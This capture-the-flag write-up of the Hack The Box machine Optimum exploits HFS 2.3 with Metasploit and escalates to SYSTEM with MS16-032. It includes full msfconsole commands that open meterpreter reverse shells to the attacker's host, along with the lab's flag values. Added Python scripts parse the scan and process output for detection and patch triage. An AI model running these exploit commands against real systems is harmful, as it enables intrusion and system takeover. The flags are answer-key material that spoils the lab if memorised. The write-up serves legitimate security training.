About

Optimum is a beginner-level machine which mainly focuses on enumeration of services with known exploits. Both exploits are easy to obtain and have associated Metasploit modules, making this machine fairly simple to complete.

Enumeration

Running the script portscan.sh reveals a single attack vector, HTTP.

┌──(m0nk3y@kali)-[~/HTB/Optimum]
└─$ sudo portscan.sh 10.129.67.164

┌──(m0nk3y@kali)-[~/HTB/Optimum]
└─$ cat PortScan\(10.129.67.164\)

PORT   STATE SERVICE VERSION
80/tcp open  http    HttpFileServer httpd 2.3
|_http-title: HFS /
|_http-server-header: HFS 2.3
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
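The banner above is the whole finding: an exposed HttpFileServer 2.3 is enough on its own to justify the searchsploit lookup that follows. As an added example that is not part of the original writeup, the script below parses nmap's normal output into service records, attaches the NSE script lines (such as `http-server-header`) to the port they belong to, and flags open services whose banner matches a watchlist of products with public exploits. The watchlist contents, regex names and function names are my own assumptions; the HFS entry mirrors the searchsploit results discussed on this page.

```python
import re

# Constructed sample input: the nmap service lines from the scan above.
NMAP_OUTPUT = """\
PORT   STATE SERVICE VERSION
80/tcp open  http    HttpFileServer httpd 2.3
|_http-title: HFS /
|_http-server-header: HFS 2.3
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
"""

# Banner watchlist (assumed for this example): product/version strings with
# public exploits that an asset owner should not see exposed. The HFS entry
# corresponds to the searchsploit hits discussed on this page.
WATCHLIST = [
    (re.compile(r"^HttpFileServer httpd 2\.3\b"),
     "Rejetto HFS 2.3.x: public remote command execution exploits and a Metasploit module exist"),
]

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
SCRIPT_RE = re.compile(r"^\|_?([\w-]+):\s*(.*)$")


def parse_nmap(text):
    """Parse nmap's normal output into a list of service records.

    NSE script lines (|_name: value) are attached to the port that precedes them.
    """
    services = []
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            port, proto, state, name, version = m.groups()
            services.append({
                "port": int(port), "proto": proto, "state": state,
                "service": name, "version": version.strip(), "scripts": {},
            })
            continue
        m = SCRIPT_RE.match(line)
        if m and services:
            services[-1]["scripts"][m.group(1)] = m.group(2).strip()
    return services


def flag_services(services):
    """Return (port, banner, note) for every open service whose banner is on the watchlist."""
    findings = []
    for svc in services:
        if svc["state"] != "open":
            continue
        for pattern, note in WATCHLIST:
            if pattern.search(svc["version"]):
                findings.append((svc["port"], svc["version"], note))
    return findings


if __name__ == "__main__":
    for port, banner, note in flag_services(parse_nmap(NMAP_OUTPUT)):
        print(f"{port}: {banner} -> {note}")
```

Run against a real scan, point `NMAP_OUTPUT` at the saved nmap file instead of the embedded sample; the watchlist is the part worth maintaining, since the parser does not change between scans.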

Exploitation

HTTP

As nmap revealed the service HttpFileServer 2.3 running on the target, I’ll look for a known exploit using searchsploit-prettify.py. The results show a remote command execution vulnerability that has an accompanying Metasploit module, listed as Rejetto HTTP File Server (HFS) - Remote Command Execution (Metasploit).

┌──(m0nk3y@kali)-[~/HTB/Optimum]
└─$ searchsploit-prettify.py 'HFS 2.3'
 -------------------------------------------------------------------------- ---------------------------------------------------------
| Exploit Title                                                            | Path                                                    |
 -------------------------------------------------------------------------- ---------------------------------------------------------
| HFS (HTTP File Server) 2.3.x - Remote Command Execution (3)              | /usr/share/exploitdb/exploits/windows/remote/49584.py   |
| HFS Http File Server 2.3m Build 300 - Buffer Overflow (PoC)              | /usr/share/exploitdb/exploits/multiple/remote/48569.py  |
| Rejetto HTTP File Server (HFS) - Remote Command Execution (Metasploit)   | /usr/share/exploitdb/exploits/windows/remote/34926.rb   |
| Rejetto HTTP File Server (HFS) 2.2/2.3 - Arbitrary File Upload           | /usr/share/exploitdb/exploits/multiple/remote/30850.txt |
| Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1)      | /usr/share/exploitdb/exploits/windows/remote/34668.txt  |
| Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2)      | /usr/share/exploitdb/exploits/windows/remote/39161.py   |
| Rejetto HTTP File Server (HFS) 2.3a/2.3b/2.3c - Remote Command Execution | /usr/share/exploitdb/exploits/windows/webapps/34852.txt |
 -------------------------------------------------------------------------- ---------------------------------------------------------

By executing the exploit, I’m able to gain a shell as the user OPTIMUM\kostas.

┌──(m0nk3y@kali)-[~/HTB/Optimum]
└─$ msfconsole -q -x 'use exploit/windows/http/rejetto_hfs_exec; set RHOSTS 10.129.67.164; set RPORT 80; set LHOST 10.10.16.9; set LPORT 4444; run'
[*] Starting persistent handler(s)...
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
RHOSTS => 10.129.67.164
RPORT => 80
LHOST => 10.10.16.9
LPORT => 4444
[*] Started reverse TCP handler on 10.10.16.9:4444
[*] Using URL: http://10.10.16.9:8080/MC6KwmspE0pF
[*] Server started.
[*] Sending a malicious request to /
[*] Payload request received: /MC6KwmspE0pF
[*] Sending stage (175686 bytes) to 10.129.67.164
[!] Tried to delete %TEMP%\gRAYbK.vbs, unknown result
[*] Meterpreter session 1 opened (10.10.16.9:4444 -> 10.129.67.164:49162) at 2023-09-07 08:08:08 -0400
[*] Server stopped.

meterpreter > getuid
Server username: OPTIMUM\kostas

Privilege Escalation

Checking the user group shows that the user OPTIMUM\kostas is not part of any privileged groups. It also shows that we are currently under a medium integrity context, which is to be expected for a normal user account.

C:\Windows\system32>whoami /groups
whoami /groups

GROUP INFORMATION
-----------------

Group Name                             Type             SID          Attributes
====================================== ================ ============ ==================================================
Everyone                               Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                          Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE               Well-known group S-1-5-4      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                          Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users       Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization         Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account             Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group
LOCAL                                  Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication       Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label            S-1-16-8192

In order to look for alternative vulnerabilities, I’ll be using the module post/multi/recon/local_exploit_suggester. However, for the module to give useful results, the architecture of our meterpreter context first needs to match the architecture of the operating system. Checking the system information reveals that the target’s operating system is x64 while we are using an x86 meterpreter shell.

meterpreter > sysinfo
Computer        : OPTIMUM
OS              : Windows 2012 R2 (6.3 Build 9600).
Architecture    : x64
System Language : el_GR
Domain          : HTB
Logged On Users : 3
Meterpreter     : x86/windows

To solve this issue, I’ll migrate into explorer.exe, which is running as an x64 process under the same user.

meterpreter > ps

Process List
============

 PID   PPID  Name                     Arch  Session  User            Path
 ---   ----  ----                     ----  -------  ----            ----
 0     0     [System Process]
 4     0     System
 208   476   svchost.exe
 228   4     smss.exe
 264   544   WmiPrvSE.exe
 332   320   csrss.exe
 384   320   wininit.exe
 392   376   csrss.exe
 420   376   winlogon.exe
 476   384   services.exe
 484   384   lsass.exe
 524   476   spoolsv.exe
 544   476   svchost.exe
 572   476   svchost.exe
 636   476   VGAuthService.exe
 660   420   dwm.exe
 672   476   svchost.exe
 708   476   svchost.exe
 764   476   svchost.exe
 832   476   svchost.exe
 912   3028  tWBREMyZnAPrX.exe        x86   1        OPTIMUM\kostas  C:\Users\kostas\AppData\Local\Temp\radAE2E4.tmp\tWBREMyZnAPrX.exe
 956   476   svchost.exe
 1016  912   cmd.exe                  x86   1        OPTIMUM\kostas  C:\Windows\SysWOW64\cmd.exe
 1028  912   cmd.exe                  x86   1        OPTIMUM\kostas  C:\Windows\SysWOW64\cmd.exe
 1044  476   vmtoolsd.exe
 1060  476   ManagementAgentHost.exe
 1084  708   taskhostex.exe           x64   1        OPTIMUM\kostas  C:\Windows\System32\taskhostex.exe
 1224  476   svchost.exe
 1424  476   dllhost.exe
 1528  1948  explorer.exe             x64   1        OPTIMUM\kostas  C:\Windows\explorer.exe
 1596  1016  conhost.exe              x64   1        OPTIMUM\kostas  C:\Windows\System32\conhost.exe
 1692  476   msdtc.exe
 1720  544   WmiPrvSE.exe
 2440  1528  vmtoolsd.exe             x64   1        OPTIMUM\kostas  C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 2540  1028  conhost.exe              x64   1        OPTIMUM\kostas  C:\Windows\System32\conhost.exe
 2568  1528  hfs.exe                  x86   1        OPTIMUM\kostas  C:\Users\kostas\Desktop\hfs.exe
 3028  2568  wscript.exe              x86   1        OPTIMUM\kostas  C:\Windows\SysWOW64\wscript.exe
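The same process listing, read from the defender's side, is a textbook detection opportunity: the web server hfs.exe has spawned wscript.exe, which launched a randomly named executable from the user's Temp directory, which in turn spawned cmd.exe. As an added example that is not part of the original writeup, the script below parses the `ps` table, rebuilds each process's parent chain, and flags executables running from Temp as well as shells or script hosts that descend from a web server process. The sets of server and shell process names, the regex and the function names are my own assumptions; the sample rows are copied from the listing above.

```python
import re

# Constructed sample input: a subset of the meterpreter `ps` listing above.
PS_OUTPUT = r"""
 PID   PPID  Name                     Arch  Session  User            Path
 ---   ----  ----                     ----  -------  ----            ----
 476   384   services.exe
 912   3028  tWBREMyZnAPrX.exe        x86   1        OPTIMUM\kostas  C:\Users\kostas\AppData\Local\Temp\radAE2E4.tmp\tWBREMyZnAPrX.exe
 1016  912   cmd.exe                  x86   1        OPTIMUM\kostas  C:\Windows\SysWOW64\cmd.exe
 1528  1948  explorer.exe             x64   1        OPTIMUM\kostas  C:\Windows\explorer.exe
 2568  1528  hfs.exe                  x86   1        OPTIMUM\kostas  C:\Users\kostas\Desktop\hfs.exe
 3028  2568  wscript.exe              x86   1        OPTIMUM\kostas  C:\Windows\SysWOW64\wscript.exe
"""

# Assumptions for this example: which processes count as internet-facing servers
# and which ones are shells or script hosts that a server should never spawn.
SERVER_PROCS = {"hfs.exe"}
SHELL_PROCS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe"}

# Rows either carry only PID/PPID/Name (processes we cannot inspect) or the full column set.
ROW_RE = re.compile(
    r"^\s*(\d+)\s+(\d+)\s+(\S+)(?:\s+(x86|x64)\s+(\d+)\s+(\S+)\s+(.*))?$"
)


def parse_ps(text):
    """Parse the `ps` table into a dict keyed by PID."""
    procs = {}
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if not m:
            continue
        pid, ppid, name, arch, session, user, path = m.groups()
        procs[int(pid)] = {
            "pid": int(pid), "ppid": int(ppid), "name": name, "arch": arch,
            "session": session, "user": user, "path": (path or "").strip(),
        }
    return procs


def lineage(procs, pid):
    """Return process names from pid up to the topmost known ancestor."""
    names = []
    seen = set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        names.append(procs[pid]["name"])
        pid = procs[pid]["ppid"]
    return names


def find_suspicious(procs):
    """Flag Temp-resident executables and shells/script hosts descended from a server."""
    findings = []
    for pid, p in procs.items():
        if re.search(r"\\AppData\\Local\\Temp\\", p["path"], re.IGNORECASE):
            findings.append((pid, "executable running from user Temp: " + p["path"]))
        chain = lineage(procs, pid)
        if p["name"].lower() in SHELL_PROCS and any(n.lower() in SERVER_PROCS for n in chain[1:]):
            findings.append((pid, "shell or script host descended from a web server: " + " <- ".join(chain)))
    return findings


if __name__ == "__main__":
    for pid, why in find_suspicious(parse_ps(PS_OUTPUT)):
        print(f"PID {pid}: {why}")
```

The parent-chain rule is the more durable of the two: the Temp path and the random file name change from run to run, but a file server launching a script host that launches a shell is the shape of the HFS exploit regardless of payload, and the same rule carries over to an EDR or Sysmon process-creation feed.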

meterpreter > migrate 1528
[*] Migrating from 912 to 1528...
[*] Migration completed successfully.

With the architecture now matched, I’ll run the module post/multi/recon/local_exploit_suggester. The result lists 9 potentially usable exploits. However, the UAC bypass modules among those 9 will not work: a UAC bypass only elevates an account that is already in the Administrators group, and OPTIMUM\kostas is not.

meterpreter > run post/multi/recon/local_exploit_suggester

[*] 10.129.67.164 - Collecting local exploits for x64/windows...
[*] 10.129.67.164 - 186 exploit checks are being tried...
[+] 10.129.67.164 - exploit/windows/local/bypassuac_dotnet_profiler: The target appears to be vulnerable.
[+] 10.129.67.164 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.129.67.164 - exploit/windows/local/bypassuac_sdclt: The target appears to be vulnerable.
[+] 10.129.67.164 - exploit/windows/local/bypassuac_sluihijack: The target appears to be vulnerable.
[+] 10.129.67.164 - exploit/windows/local/cve_2019_1458_wizardopium: The target appears to be vulnerable.
[+] 10.129.67.164 - exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move: The service is running, but could not be validated. Vulnerable Windows 8.1/Windows Server 2012 R2 build detected!
[+] 10.129.67.164 - exploit/windows/local/cve_2021_40449: The service is running, but could not be validated. Windows 8.1/Windows Server 2012 R2 build detected!
[+] 10.129.67.164 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[+] 10.129.67.164 - exploit/windows/local/tokenmagic: The target appears to be vulnerable.
[*] Running check method for exploit 43 / 43
[*] 10.129.67.164 - Valid modules for session 1:
============================

 #   Name                                                           Potentially Vulnerable?  Check Result
 -   ----                                                           -----------------------  ------------
 1   exploit/windows/local/bypassuac_dotnet_profiler                Yes                      The target appears to be vulnerable.
 2   exploit/windows/local/bypassuac_eventvwr                       Yes                      The target appears to be vulnerable.
 3   exploit/windows/local/bypassuac_sdclt                          Yes                      The target appears to be vulnerable.
 4   exploit/windows/local/bypassuac_sluihijack                     Yes                      The target appears to be vulnerable.
 5   exploit/windows/local/cve_2019_1458_wizardopium                Yes                      The target appears to be vulnerable.
 6   exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move   Yes                      The service is running, but could not be validated. Vulnerable Windows 8.1/Windows Server 2012 R2 build detected!
 7   exploit/windows/local/cve_2021_40449                           Yes                      The service is running, but could not be validated. Windows 8.1/Windows Server 2012 R2 build detected!
 8   exploit/windows/local/ms16_032_secondary_logon_handle_privesc  Yes                      The service is running, but could not be validated.
 9   exploit/windows/local/tokenmagic                               Yes                      The target appears to be vulnerable.
 10  exploit/windows/local/agnitum_outpost_acs                      No                       The target is not exploitable.
 11  exploit/windows/local/always_install_elevated                  No                       The target is not exploitable.
 12  exploit/windows/local/bits_ntlm_token_impersonation            No                       The target is not exploitable.
 13  exploit/windows/local/bypassuac_fodhelper                      No                       The target is not exploitable.
 14  exploit/windows/local/canon_driver_privesc                     No                       The target is not exploitable. No Canon TR150 driver directory found
 15  exploit/windows/local/capcom_sys_exec                          No                       Cannot reliably check exploitability.
 16  exploit/windows/local/cve_2020_0796_smbghost                   No                       The target is not exploitable.
 17  exploit/windows/local/cve_2020_1048_printerdemon               No                       The target is not exploitable.
 18  exploit/windows/local/cve_2020_1054_drawiconex_lpe             No                       The target is not exploitable. No target for win32k.sys version 6.3.9600.17393
 19  exploit/windows/local/cve_2020_1313_system_orchestrator        No                       The target is not exploitable.
 20  exploit/windows/local/cve_2020_1337_printerdemon               No                       The target is not exploitable.
 21  exploit/windows/local/cve_2020_17136                           No                       The target is not exploitable. The build number of the target machine does not appear to be a vulnerable version!
 22  exploit/windows/local/cve_2021_21551_dbutil_memmove            No                       The target is not exploitable.
 23  exploit/windows/local/cve_2022_21882_win32k                    No                       The target is not exploitable.
 24  exploit/windows/local/cve_2022_21999_spoolfool_privesc         No                       The target is not exploitable.
 25  exploit/windows/local/cve_2022_3699_lenovo_diagnostics_driver  No                       The target is not exploitable.
 26  exploit/windows/local/cve_2023_21768_afd_lpe                   No                       The target is not exploitable. The exploit only supports Windows 11 22H2
 27  exploit/windows/local/gog_galaxyclientservice_privesc          No                       The target is not exploitable. Galaxy Client Service not found
 28  exploit/windows/local/ikeext_service                           No                       The check raised an exception.
 29  exploit/windows/local/lexmark_driver_privesc                   No                       The target is not exploitable. No Lexmark print drivers in the driver store
 30  exploit/windows/local/ms10_092_schelevator                     No                       The target is not exploitable. Windows 2012 R2 (6.3 Build 9600). is not vulnerable
 31  exploit/windows/local/ms14_058_track_popup_menu                No                       The target is not exploitable.
 32  exploit/windows/local/ms15_051_client_copy_image               No                       The target is not exploitable.
 33  exploit/windows/local/ms15_078_atmfd_bof                       No                       Cannot reliably check exploitability.
 34  exploit/windows/local/ms16_014_wmi_recv_notif                  No                       The target is not exploitable.
 35  exploit/windows/local/ms16_075_reflection                      No                       The target is not exploitable.
 36  exploit/windows/local/ms16_075_reflection_juicy                No                       The target is not exploitable.
 37  exploit/windows/local/ntapphelpcachecontrol                    No                       The check raised an exception.
 38  exploit/windows/local/nvidia_nvsvc                             No                       The check raised an exception.
 39  exploit/windows/local/panda_psevents                           No                       The target is not exploitable.
 40  exploit/windows/local/ricoh_driver_privesc                     No                       The target is not exploitable. No Ricoh driver directory found
 41  exploit/windows/local/srclient_dll_hijacking                   No                       The target is not exploitable. Target is not Windows Server 2012.
 42  exploit/windows/local/virtual_box_opengl_escape                No                       The target is not exploitable.
 43  exploit/windows/local/webexec                                  No                       The check raised an exception.
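Two pieces of reasoning on this page fit together: the `whoami /groups` output earlier establishes that the token runs at Medium integrity without BUILTIN\Administrators, and that fact is what rules out the bypassuac_* entries in the suggester table above. As an added example that is not part of the original writeup, the script below parses both outputs, derives the integrity level and admin membership from the well-known SIDs, and filters the suggester rows down to the ones that actually apply. From a defender's side the surviving names are the patch backlog on the host. The SID table, regexes and function names are my own; the sample rows are excerpts of the outputs shown above.

```python
import re

# Constructed sample input: an excerpt of the `whoami /groups` output above.
WHOAMI_GROUPS = r"""
Group Name                             Type             SID          Attributes
====================================== ================ ============ ==================================================
Everyone                               Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                          Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users       Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label            S-1-16-8192
"""

# Constructed sample input: an excerpt of the local_exploit_suggester table above.
SUGGESTER = r"""
 #   Name                                                           Potentially Vulnerable?  Check Result
 -   ----                                                           -----------------------  ------------
 1   exploit/windows/local/bypassuac_dotnet_profiler                Yes                      The target appears to be vulnerable.
 5   exploit/windows/local/cve_2019_1458_wizardopium                Yes                      The target appears to be vulnerable.
 8   exploit/windows/local/ms16_032_secondary_logon_handle_privesc  Yes                      The service is running, but could not be validated.
 10  exploit/windows/local/agnitum_outpost_acs                      No                       The target is not exploitable.
"""

ADMINISTRATORS_SID = "S-1-5-32-544"   # BUILTIN\Administrators
INTEGRITY_LEVELS = {                  # well-known mandatory label RIDs (S-1-16-<rid>)
    4096: "Low", 8192: "Medium", 8448: "Medium Plus", 12288: "High", 16384: "System",
}
SID_RE = re.compile(r"\bS-1-\d+(?:-\d+)+\b")
MODULE_RE = re.compile(r"^\s*\d+\s+(exploit/\S+)\s+(Yes|No)\s+(.*)$")


def parse_whoami_groups(text):
    """Extract every SID, the integrity level label, and whether Administrators is held."""
    sids = SID_RE.findall(text)
    integrity = None
    for sid in sids:
        if sid.startswith("S-1-16-"):
            integrity = INTEGRITY_LEVELS.get(int(sid.rsplit("-", 1)[1]), sid)
    return {"sids": sids, "integrity": integrity, "is_admin": ADMINISTRATORS_SID in sids}


def parse_suggester(text):
    """Turn the suggester table into rows of module name, Yes/No flag and check text."""
    rows = []
    for line in text.splitlines():
        m = MODULE_RE.match(line)
        if m:
            rows.append({"name": m.group(1), "vulnerable": m.group(2) == "Yes",
                         "check": m.group(3).strip()})
    return rows


def actionable_modules(rows, ctx):
    """Drop 'No' rows, and drop UAC bypasses unless the token already holds Administrators."""
    out = []
    for row in rows:
        if not row["vulnerable"]:
            continue
        if "bypassuac" in row["name"] and not ctx["is_admin"]:
            continue
        out.append(row)
    return out


if __name__ == "__main__":
    ctx = parse_whoami_groups(WHOAMI_GROUPS)
    print(f"integrity={ctx['integrity']} admin={ctx['is_admin']}")
    for row in actionable_modules(parse_suggester(SUGGESTER), ctx):
        print(f"{row['name']}: {row['check']}")
```

Note the two kinds of "Yes" the suggester emits: "appears to be vulnerable" came from a positive check, while "could not be validated" only means the OS build is in range. Keeping the check text alongside the name preserves that distinction for whoever has to decide which patch to prioritise.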

After some trial and error, I’m able to use the module exploit/windows/local/ms16_032_secondary_logon_handle_privesc to gain a shell as the user NT AUTHORITY\SYSTEM.

meterpreter > run exploit/windows/local/ms16_032_secondary_logon_handle_privesc LHOST=10.10.16.9 LPORT=4444 TARGET='Windows x64'

[*] Started reverse TCP handler on 10.10.16.9:4444
[+] Compressed size: 1160
[!] Executing 32-bit payload on 64-bit ARCH, using SYSWOW64 powershell
[*] Writing payload file, C:\Users\kostas\AppData\Local\Temp\qDINtEgPsp.ps1...
[*] Compressing script contents...
[+] Compressed size: 3739
[*] Executing exploit script...
	 __ __ ___ ___   ___     ___ ___ ___
	|  V  |  _|_  | |  _|___|   |_  |_  |
	|     |_  |_| |_| . |___| | |_  |  _|
	|_|_|_|___|_____|___|   |___|___|___|

	               [by b33f -> @FuzzySec]

[?] Operating system core count: 2
[>] Duplicating CreateProcessWithLogonW handle
[?] Done, using thread handle: 1204

[*] Sniffing out privileged impersonation token..

[?] Thread belongs to: svchost
[+] Thread suspended
[>] Wiping current impersonation token
[>] Building SYSTEM impersonation token
[!] NtImpersonateThread failed, exiting..
[+] Thread resumed!

[*] Sniffing out SYSTEM shell..

[>] Duplicating SYSTEM token
[>] Starting token race
[>] Starting process race
[!] Holy handle leak Batman, we have a SYSTEM shell!!

lwqsiNw04yJAGLMS9cJvCXTn2hVJuH6T
[+] Executed on target machine.
[*] Sending stage (175686 bytes) to 10.129.67.164
[*] Meterpreter session 2 opened (10.10.16.9:4444 -> 10.129.67.164:49171) at 2023-09-07 08:25:03 -0400
[+] Deleted C:\Users\kostas\AppData\Local\Temp\qDINtEgPsp.ps1
[*] Session 2 created in the background.

meterpreter > sessions 2
[*] Backgrounding session 1...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Post Exploitation

With the shell acquired, I’m able to read the flags user.txt and root.txt.

meterpreter > cat 'C:\Users\kostas\Desktop\user.txt'
f6077fb551d577bb0cd0c4445f547dfe

meterpreter > cat 'C:\Users\Administrator\Desktop\root.txt'
5c9858e3ab9604f4cff6e99532216d4f